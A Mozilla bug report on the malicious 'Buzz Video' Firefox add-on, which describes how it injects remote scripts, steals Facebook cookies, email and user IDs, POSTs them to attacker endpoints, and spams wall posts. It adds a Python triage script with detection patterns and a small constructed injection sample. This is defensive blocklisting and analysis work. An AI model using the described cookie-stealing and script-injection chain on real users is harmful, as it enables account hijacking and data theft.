Bug 722844 - Malicious "Buzz Video" add-on
Product: Toolkit
Classification: Components
Component: Blocklisting
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-01-31 13:36 PST by MarkH
Modified: 2016-03-07 15:30 PST

Attachment: 20120131 buzz (84.48 KB, application/octet-stream), 2012-01-31 13:36 PST, MarkH

Description MarkH 2012-01-31 13:36:03 PST
Created attachment 593208: 20120131 buzz

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded an add-on from http://www.nos-delires[.]com/BuzzzzVideos.xpi

Actual results:

update URL: http://www.buzzzzvideos/[.]info/update.rdf

The add-on injects youtube.js from the add-on into every page's DOM

That injects http://www.buzzzzvideos/[.]info/plugin.js

... which injects http://www.buzzzzvideos/[.]info/lolz.js?nocache

has jQuery embedded in it

grabs your Facebook cookies

Grabs your email address via and POSTs it to http://www.buzzzzvideos/[.]info/process/a.php

Posts your Facebook UID to http://www.buzzzzvideos/[.]info/process/a1.php

Grabs all of your friends via

Sends a like of Facebook page ID 267294696673364

Posts an update to your Facebook wall with one of the following URLs and mentions that you are with all of your friends.

Posts to Facebook's Open Graph ( one of the following URLs:

Expected results:

It should not steal your Facebook cookies and post to Facebook without your consent.
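A triage helper added here as an example (my code, not anything attached to this bug) that unpacks an XPI and flags the traits the report describes: a plain-http em:updateURL in install.rdf, remote script URLs, script-element creation and document.cookie reads in bundled scripts. The sample XPI and its .invalid domains are constructed inline and are not the reported add-on.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

EM_NS = "http://www.mozilla.org/2004/em-rdf#"
# Traits from the report worth flagging when triaging an unpacked add-on.
SUSPECT = {
    "remote_script": re.compile(r"""https?://[^\s'"]+\.js\b""", re.I),
    "script_injection": re.compile(r"""createElement\(\s*['"]script['"]\s*\)"""),
    "cookie_access": re.compile(r"document\.cookie"),
}

def triage_xpi(xpi_bytes: bytes) -> dict:
    """Return the install.rdf updateURL and per-file hits on the patterns above."""
    report = {"update_url": None, "insecure_update": False, "findings": []}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as xpi:
        names = xpi.namelist()
        if "install.rdf" in names:
            root = ET.fromstring(xpi.read("install.rdf"))
            node = root.find(f".//{{{EM_NS}}}updateURL")
            if node is not None and node.text:
                url = node.text.strip()
                report["update_url"] = url
                # A plain-http update URL lets a network attacker swap the add-on.
                report["insecure_update"] = url.lower().startswith("http://")
        for name in names:
            if name.endswith(".js"):
                text = xpi.read(name).decode("utf-8", errors="replace")
                for label, pat in SUSPECT.items():
                    for hit in pat.findall(text):
                        report["findings"].append((name, label, hit))
    return report

def build_sample_xpi() -> bytes:
    """Constructed sample mirroring the reported chain; not the real add-on."""
    install_rdf = (
        f'<?xml version="1.0"?><RDF xmlns:em="{EM_NS}">'
        '<Description about="urn:mozilla:install-manifest">'
        "<em:id>sample@example.invalid</em:id>"
        "<em:updateURL>http://update.example.invalid/update.rdf</em:updateURL>"
        "</Description></RDF>"
    )
    youtube_js = ('var s = document.createElement("script");\n'
                  's.src = "http://cdn.example.invalid/plugin.js";\n'
                  "document.body.appendChild(s);\nvar c = document.cookie;\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as xpi:
        xpi.writestr("install.rdf", install_rdf)
        xpi.writestr("chrome/content/youtube.js", youtube_js)
    return buf.getvalue()
```

Run `triage_xpi(open("some.xpi", "rb").read())` against a real package to get the same report; a hit list is a prompt for manual review, not a verdict.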
Comment 1 Jorge Villalobos [:jorgev] 2012-01-31 14:36:08 PST
Comment 2 Jorge Villalobos [:jorgev] 2012-01-31 14:51:31 PST
